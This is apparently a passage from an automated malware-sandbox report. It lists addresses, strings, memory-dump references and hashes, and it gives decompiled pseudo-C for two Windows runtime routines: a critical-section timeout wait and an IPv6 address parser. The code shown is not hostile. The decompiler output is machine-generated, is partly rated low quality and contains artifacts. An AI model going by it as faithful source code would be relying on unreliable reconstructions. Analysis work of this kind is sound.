                                                                                                                                                        0x009222f9
                                                                                                                                                        0x009222fa
                                                                                                                                                        0x00922305
                                                                                                                                                        0x00922314
                                                                                                                                                        0x00922319
                                                                                                                                                        0x0092231a
                                                                                                                                                        0x0092231d
                                                                                                                                                        0x00922320
                                                                                                                                                        0x00922323
                                                                                                                                                        0x00922323
                                                                                                                                                        0x00922328
                                                                                                                                                        0x0092232d
                                                                                                                                                        0x0092232f
                                                                                                                                                        0x00922331
                                                                                                                                                        0x00922336
                                                                                                                                                        0x00922336
                                                                                                                                                        0x0092233b
                                                                                                                                                        0x0092233d
                                                                                                                                                        0x00922350
                                                                                                                                                        0x00922351
                                                                                                                                                        0x00922356
                                                                                                                                                        0x00922359
                                                                                                                                                        0x00922359
                                                                                                                                                        0x0092235b
                                                                                                                                                        0x0092235d
                                                                                                                                                        0x008e5367
                                                                                                                                                        0x008e536b
                                                                                                                                                        0x008e5372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922363
                                                                                                                                                        0x00922363
                                                                                                                                                        0x00922369
                                                                                                                                                        0x0092236a
                                                                                                                                                        0x0092236c
                                                                                                                                                        0x00922371
                                                                                                                                                        0x00922373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00922379
                                                                                                                                                        0x00922379
                                                                                                                                                        0x0092237a
                                                                                                                                                        0x0092237f
                                                                                                                                                        0x0092237f
                                                                                                                                                        0x00922385
                                                                                                                                                        0x00922386
                                                                                                                                                        0x00922389
                                                                                                                                                        0x0092238e
                                                                                                                                                        0x00922390
                                                                                                                                                        0x008e5378
                                                                                                                                                        0x008e537c
                                                                                                                                                        0x00922396
                                                                                                                                                        0x00922396
                                                                                                                                                        0x00922397
                                                                                                                                                        0x0092239c
                                                                                                                                                        0x009223a2
                                                                                                                                                        0x009223a3
                                                                                                                                                        0x009223a6
                                                                                                                                                        0x009223ab
                                                                                                                                                        0x009223ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009223b3
                                                                                                                                                        0x009223b3
                                                                                                                                                        0x009223b4
                                                                                                                                                        0x009223b9
                                                                                                                                                        0x009223ba
                                                                                                                                                        0x009223ba
                                                                                                                                                        0x009223bc
                                                                                                                                                        0x009223bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00919153
                                                                                                                                                        0x00919158
                                                                                                                                                        0x0091915a
                                                                                                                                                        0x0091915e
                                                                                                                                                        0x00919160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00919166
                                                                                                                                                        0x00919166
                                                                                                                                                        0x00919171
                                                                                                                                                        0x00919176
                                                                                                                                                        0x00919176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00919160
                                                                                                                                                        0x009223c6
                                                                                                                                                        0x009223cb
                                                                                                                                                        0x009223ce
                                                                                                                                                        0x009223d7
                                                                                                                                                        0x009223d7
                                                                                                                                                        0x009223ad
                                                                                                                                                        0x00922390
                                                                                                                                                        0x00922373
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092233f
                                                                                                                                                        0x00922291
                                                                                                                                                        0x00922291
                                                                                                                                                        0x00922293
                                                                                                                                                        0x00922295
                                                                                                                                                        0x0092229a
                                                                                                                                                        0x009222a1
                                                                                                                                                        0x009222a3
                                                                                                                                                        0x009222a7
                                                                                                                                                        0x009222a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222ab
                                                                                                                                                        0x009222ad
                                                                                                                                                        0x009222af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222af
                                                                                                                                                        0x009222b1
                                                                                                                                                        0x009222b4
                                                                                                                                                        0x009222b4
                                                                                                                                                        0x009222b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009222b6
                                                                                                                                                        0x0092228f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092226d
                                                                                                                                                        0x008e53cb
                                                                                                                                                        0x008e53ce
                                                                                                                                                        0x008e53d0
                                                                                                                                                        0x008e53d4
                                                                                                                                                        0x008e53d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e53d8
                                                                                                                                                        0x008e53e3
                                                                                                                                                        0x008e53ea
                                                                                                                                                        0x008e53ea
                                                                                                                                                        0x008e53d6
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009222F4
                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009222FC
                                                                                                                                                        • RTL: Resource at %p, xrefs: 0092230B
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 00922328
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-871070163
                                                                                                                                                        • Opcode ID: 1027d14c637813b510018e9f0e149c0f38151fcf388f2d33e48c474d3080c1ae
                                                                                                                                                        • Instruction ID: 146231664f337d54ada5b514624ca4cd9e6bdcc1f33c7041862d277fd9fddd68
                                                                                                                                                        • Opcode Fuzzy Hash: 1027d14c637813b510018e9f0e149c0f38151fcf388f2d33e48c474d3080c1ae
                                                                                                                                                        • Instruction Fuzzy Hash: D9513771600715ABEB14DB29DC81FA673ACFF96764F104229FD14DB381EA71EC4287A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008EEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E008EEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E008DDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x9a793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008C16C0(_t39);
				} else {
					_t40 = E008BF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00903915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008C01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x9a793c; // 0x0
								_push(_t85);
								_t44 = E008C1F28(_t71);
							} else {
								_t44 = E008BF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00903915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00942306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E008EEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00904FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00913F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00913F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9a20c0;
								if(_t85 != 0x9a20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0094217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00913F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                        0x008eec56
                                                                                                                                                        0x008eec56
                                                                                                                                                        0x008eec56
                                                                                                                                                        0x008eec5c
                                                                                                                                                        0x008eec64
                                                                                                                                                        0x009223e6
                                                                                                                                                        0x009223eb
                                                                                                                                                        0x009223eb
                                                                                                                                                        0x008eec6a
                                                                                                                                                        0x008eec6c
                                                                                                                                                        0x008eec6f
                                                                                                                                                        0x009223f3
                                                                                                                                                        0x009223f8
                                                                                                                                                        0x009223fa
                                                                                                                                                        0x009223fc
                                                                                                                                                        0x008eec75
                                                                                                                                                        0x008eec76
                                                                                                                                                        0x008eec76
                                                                                                                                                        0x008eec7b
                                                                                                                                                        0x008eec7c
                                                                                                                                                        0x008eec7e
                                                                                                                                                        0x00922406
                                                                                                                                                        0x00922407
                                                                                                                                                        0x0092240c
                                                                                                                                                        0x0092240d
                                                                                                                                                        0x0092240d
                                                                                                                                                        0x0092240d
                                                                                                                                                        0x00922414
                                                                                                                                                        0x00922417
                                                                                                                                                        0x0092241e
                                                                                                                                                        0x00922435
                                                                                                                                                        0x00922438
                                                                                                                                                        0x0092243c
                                                                                                                                                        0x0092243f
                                                                                                                                                        0x00922442
                                                                                                                                                        0x00922443
                                                                                                                                                        0x00922446
                                                                                                                                                        0x00922449
                                                                                                                                                        0x00922453
                                                                                                                                                        0x00922455
                                                                                                                                                        0x0092245b
                                                                                                                                                        0x0092245b
                                                                                                                                                        0x008eeb99
                                                                                                                                                        0x008eeb99
                                                                                                                                                        0x008eeb9c
                                                                                                                                                        0x008eeb9d
                                                                                                                                                        0x008eeb9f
                                                                                                                                                        0x008eeba2
                                                                                                                                                        0x00922465
                                                                                                                                                        0x0092246b
                                                                                                                                                        0x0092246d
                                                                                                                                                        0x008eeba8
                                                                                                                                                        0x008eeba9
                                                                                                                                                        0x008eeba9
                                                                                                                                                        0x008eebae
                                                                                                                                                        0x008eebb3
                                                                                                                                                        0x008eebb9
                                                                                                                                                        0x008eebbb
                                                                                                                                                        0x00922513
                                                                                                                                                        0x00922514
                                                                                                                                                        0x00922519
                                                                                                                                                        0x0092251b
                                                                                                                                                        0x008eec2a
                                                                                                                                                        0x008eec2d
                                                                                                                                                        0x008eec33
                                                                                                                                                        0x008eec36
                                                                                                                                                        0x008eec3a
                                                                                                                                                        0x008eec3e
                                                                                                                                                        0x008eec40
                                                                                                                                                        0x008eec47
                                                                                                                                                        0x008eec47
                                                                                                                                                        0x008eec40
                                                                                                                                                        0x008c22c6
                                                                                                                                                        0x008eebc1
                                                                                                                                                        0x008eebc1
                                                                                                                                                        0x008eebc5
                                                                                                                                                        0x008eec9a
                                                                                                                                                        0x008eec9a
                                                                                                                                                        0x008eebd6
                                                                                                                                                        0x008eebd6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008eebbb
                                                                                                                                                        0x00922477
                                                                                                                                                        0x0092247c
                                                                                                                                                        0x00922486
                                                                                                                                                        0x0092248b
                                                                                                                                                        0x00922496
                                                                                                                                                        0x0092249b
                                                                                                                                                        0x0092249d
                                                                                                                                                        0x009224a0
                                                                                                                                                        0x009224a3
                                                                                                                                                        0x009224aa
                                                                                                                                                        0x009224aa
                                                                                                                                                        0x009224a5
                                                                                                                                                        0x009224a5
                                                                                                                                                        0x009224a5
                                                                                                                                                        0x009224ac
                                                                                                                                                        0x009224af
                                                                                                                                                        0x009224b0
                                                                                                                                                        0x009224b3
                                                                                                                                                        0x009224b9
                                                                                                                                                        0x009224ba
                                                                                                                                                        0x009224bb
                                                                                                                                                        0x009224c6
                                                                                                                                                        0x009224cb
                                                                                                                                                        0x009224cd
                                                                                                                                                        0x009224d0
                                                                                                                                                        0x009224d1
                                                                                                                                                        0x009224d4
                                                                                                                                                        0x009224d6
                                                                                                                                                        0x009224d9
                                                                                                                                                        0x009224d9
                                                                                                                                                        0x009224dc
                                                                                                                                                        0x009224df
                                                                                                                                                        0x009224e1
                                                                                                                                                        0x009224e7
                                                                                                                                                        0x009224e9
                                                                                                                                                        0x009224ec
                                                                                                                                                        0x009224ef
                                                                                                                                                        0x009224f2
                                                                                                                                                        0x009224f2
                                                                                                                                                        0x009224ef
                                                                                                                                                        0x009224e7
                                                                                                                                                        0x009224fa
                                                                                                                                                        0x009224ff
                                                                                                                                                        0x00922501
                                                                                                                                                        0x00922503
                                                                                                                                                        0x00922506
                                                                                                                                                        0x0092250b
                                                                                                                                                        0x008eeb8c
                                                                                                                                                        0x008eeb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008eeb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008eeb99
                                                                                                                                                        0x008eec85
                                                                                                                                                        0x008eec85
                                                                                                                                                        0x008eec85
                                                                                                                                                        0x00000000

                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009224BD
                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0092248D
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 009224FA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                        • Opcode ID: 02e70fa68b300a369afab4090a9c3230fea6a8287b51a5e18554026b5fc455ea
                                                                                                                                                        • Instruction ID: 7fed8ecd225f7c452b8550a1e146dc44be2ed6bb4e60e0a285cc7c9590204f12
                                                                                                                                                        • Opcode Fuzzy Hash: 02e70fa68b300a369afab4090a9c3230fea6a8287b51a5e18554026b5fc455ea
                                                                                                                                                        • Instruction Fuzzy Hash: 4F41D570600214BBDB20EFA9DC85FAA77B8FF85720F208619F565DB3D1D634E9418761
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008FFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E008FFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E008FEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E008FEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E008F685D(_t167, 4) == 0) {
								if(E008F685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E008F685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E008F685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E008D8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E008CDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E008FEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E008FEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                        0x008ffcd1
                                                                                                                                                        0x008ffcd6
                                                                                                                                                        0x008ffcd9
                                                                                                                                                        0x008ffcdc
                                                                                                                                                        0x008ffcdf
                                                                                                                                                        0x008ffce2
                                                                                                                                                        0x008ffce5
                                                                                                                                                        0x008ffce8
                                                                                                                                                        0x008ffceb
                                                                                                                                                        0x008ffced
                                                                                                                                                        0x008ffced
                                                                                                                                                        0x008ffcf3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffcfc
                                                                                                                                                        0x008ffcfe
                                                                                                                                                        0x008ffdc1
                                                                                                                                                        0x0092ecbd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eccc
                                                                                                                                                        0x0092eccc
                                                                                                                                                        0x0092ecd2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ecdf
                                                                                                                                                        0x0092ece0
                                                                                                                                                        0x0092ece4
                                                                                                                                                        0x0092eceb
                                                                                                                                                        0x0092ecee
                                                                                                                                                        0x0092eca8
                                                                                                                                                        0x0092eca8
                                                                                                                                                        0x0092ecaa
                                                                                                                                                        0x008ffd76
                                                                                                                                                        0x008ffd79
                                                                                                                                                        0x008ffdb4
                                                                                                                                                        0x008ffdb5
                                                                                                                                                        0x008ffdb6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffdb6
                                                                                                                                                        0x008ffd7e
                                                                                                                                                        0x0092ecfc
                                                                                                                                                        0x008ffe2f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffe2f
                                                                                                                                                        0x0092ed08
                                                                                                                                                        0x0092ed0f
                                                                                                                                                        0x0092ed17
                                                                                                                                                        0x0092ed1b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed1b
                                                                                                                                                        0x008ffd88
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd94
                                                                                                                                                        0x008ffd99
                                                                                                                                                        0x008ffda1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffdb0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffdb0
                                                                                                                                                        0x0092ecbd
                                                                                                                                                        0x008ffdc7
                                                                                                                                                        0x008ffdcb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffdd7
                                                                                                                                                        0x008ffde3
                                                                                                                                                        0x008ffe06
                                                                                                                                                        0x00911fe7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00911fef
                                                                                                                                                        0x00911ff0
                                                                                                                                                        0x00911ff4
                                                                                                                                                        0x00911ff7
                                                                                                                                                        0x00911ffa
                                                                                                                                                        0x00911ffd
                                                                                                                                                        0x00912000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ecf1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ecf1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffe06
                                                                                                                                                        0x008ffde8
                                                                                                                                                        0x008ffdec
                                                                                                                                                        0x008ffdef
                                                                                                                                                        0x008ffdf2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffdf2
                                                                                                                                                        0x008ffdcb
                                                                                                                                                        0x008ffd04
                                                                                                                                                        0x008ffd05
                                                                                                                                                        0x0092ec67
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ec6f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ec6f
                                                                                                                                                        0x008ffd13
                                                                                                                                                        0x008ffd3c
                                                                                                                                                        0x008ffd40
                                                                                                                                                        0x0092ec75
                                                                                                                                                        0x0092ec7a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ec8a
                                                                                                                                                        0x0092ec8a
                                                                                                                                                        0x0092ec90
                                                                                                                                                        0x0092ecb2
                                                                                                                                                        0x008ffd73
                                                                                                                                                        0x008ffd73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd73
                                                                                                                                                        0x0092ec95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eca1
                                                                                                                                                        0x0092eca4
                                                                                                                                                        0x0092eca5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092eca5
                                                                                                                                                        0x0092ec7a
                                                                                                                                                        0x008ffd4a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd6e
                                                                                                                                                        0x008ffd6e
                                                                                                                                                        0x008ffd71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd71
                                                                                                                                                        0x008ffd4a
                                                                                                                                                        0x008ffd21
                                                                                                                                                        0x0090a3a1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090a3a1
                                                                                                                                                        0x008ffd36
                                                                                                                                                        0x0091200b
                                                                                                                                                        0x00912012
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00912018
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00912018
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008ffd36
                                                                                                                                                        0x008ffe0f
                                                                                                                                                        0x008ffe16
                                                                                                                                                        0x0090a3ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090a3b3
                                                                                                                                                        0x0090a3b3
                                                                                                                                                        0x008ffe1f
                                                                                                                                                        0x0092ed25
                                                                                                                                                        0x0092ed86
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed91
                                                                                                                                                        0x0092ed95
                                                                                                                                                        0x0092ed95
                                                                                                                                                        0x0092ed9a
                                                                                                                                                        0x0092edad
                                                                                                                                                        0x0092edb3
                                                                                                                                                        0x0092edba
                                                                                                                                                        0x0092edc4
                                                                                                                                                        0x0092edc9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092edcc
                                                                                                                                                        0x0092ed2a
                                                                                                                                                        0x0092ed55
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0092ed61
                                                                                                                                                        0x0092ed66
                                                                                                                                                        0x0092ed6e
                                                                                                                                                        0x00000000
